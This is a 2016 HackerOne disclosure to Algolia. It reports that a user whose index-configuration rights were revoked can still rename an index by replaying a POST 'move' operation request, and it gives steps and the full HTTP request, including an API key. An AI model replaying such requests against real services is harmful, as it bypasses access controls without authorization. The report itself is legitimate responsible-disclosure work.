Algolia: User with limited access to Index configuration can rename the Index

ID H1:99969
Type hackerone
Reporter bugs3ra
Modified 2016-06-01T10:16:55



I just noticed that user with limited access to any index can still rename it by replaying the old request after changing some values in the post request.

Steps: 1. Invite user to your application. 2. Give User full access. 3. Now login the invited account, and create an index. 4. Go back to admin account and remove the access to configure index. 5. On Invited account, all index configuration options will disappear. 6. Post the following request.

POST /1/indexes/<index name>/operation?x-algolia-api-key=395d4963afcdba0c00f4e8847459a8fd&x-algolia-application-id=JC6IO59O0A&x-algolia-agent=Algolia%20for%20vanilla%20JavaScript%203.7.5 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: Content-Length: 39 Origin: Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

{"operation":"move","destination":"put index name here"}

  1. Now reload the page, U'll notice the index will be having new name.

I guess, other changes can also be made like deleting or adding objects to this index.